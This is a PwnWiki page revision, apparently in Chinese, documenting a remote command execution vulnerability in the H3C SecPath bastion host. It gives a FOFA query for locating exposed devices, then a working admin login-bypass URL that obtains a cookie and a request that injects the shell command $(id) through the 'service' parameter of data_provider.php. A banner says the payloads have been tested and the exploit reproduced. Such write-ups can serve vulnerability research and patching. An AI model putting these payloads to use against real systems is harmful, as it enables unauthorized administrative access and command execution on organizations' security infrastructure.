Difference between revisions of "H3C SecParh堡壘機 data provider.php 遠程命令執行漏洞/zh-cn"

From PwnWiki
(Created page with "H3C SecParh堡垒机 data provider.php 远程命令执行漏洞")
 
(Created page with "==漏洞影响==")
 
Line 11: Line 11:
 
<br><noinclude>
 
<br><noinclude>
  
<div lang="chinese" dir="ltr" class="mw-content-ltr">
+
==漏洞影响==
==漏洞影響==
 
</div>
 
 
H3C SecParh fortress machine
 
H3C SecParh fortress machine
  
Line 21: Line 19:
 
</pre>
 
</pre>
  
<div lang="chinese" dir="ltr" class="mw-content-ltr">
 
 
==漏洞利用==
 
==漏洞利用==
</div>
+
通过任意用户登录获取Cookie:
<div lang="chinese" dir="ltr" class="mw-content-ltr">
 
通過任意用戶登錄獲取Cookie:
 
</div>
 
 
<pre>
 
<pre>
 
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
 
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
Line 35: Line 29:
 
</pre>
 
</pre>
  
<div lang="chinese" dir="ltr" class="mw-content-ltr">
+
==参考==
==參考==
 
</div>
 
 
https://mp.weixin.qq.com/s/rt8lJaLUTVuZd187zrruMw
 
https://mp.weixin.qq.com/s/rt8lJaLUTVuZd187zrruMw

Latest revision as of 10:08, 21 June 2021

Other languages:
Chinese • ‎中文(中国大陆)‎ • ‎中文(台灣)‎
Check.png 該漏洞已通過驗證。
本頁面的EXP/POC/Payload經測試可用,漏洞已經成功復現。


漏洞影响

H3C SecParh fortress machine

FOFA

app="H3C-SecPath-运维审计系统"

漏洞利用

通过任意用户登录获取Cookie: 

/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin

/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(id)&identity_cond=&query_type=all&format=json&browse=true

参考

https://mp.weixin.qq.com/s/rt8lJaLUTVuZd187zrruMw

Retrieved from "https://pwnwiki.com/index.php?title=H3C_SecParh堡壘機_data_provider.php_遠程命令執行漏洞/zh-cn&oldid=5470"